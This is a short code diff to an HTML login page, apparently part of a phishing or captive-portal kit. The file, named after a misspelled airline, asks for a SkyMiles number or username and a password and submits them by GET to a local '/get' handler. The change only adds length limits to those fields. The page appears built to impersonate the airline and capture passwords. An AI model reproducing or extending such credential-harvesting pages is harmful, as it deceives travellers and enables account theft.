--- a/portals/airlines/detla_airline.html
+++ b/portals/airlines/detla_airline.html
@@ -97,11 +97,11 @@ body {
 <form action="/get" id="email-form-step" method="GET">
 
 <div class="form-group">
-<input class="input-field" name="email" type="text" placeholder="SkyMiles # or Username" required>
+<input class="input-field" name="email" type="text" placeholder="SkyMiles # or Username" maxlength="100" required>
 </div>
 
 <div class="form-group">
-<input class="input-field" name="password" type="password" placeholder="Password" required>
+<input class="input-field" name="password" type="password" placeholder="Password" maxlength="100" required>
 </div>
 
 <div class="form-group">
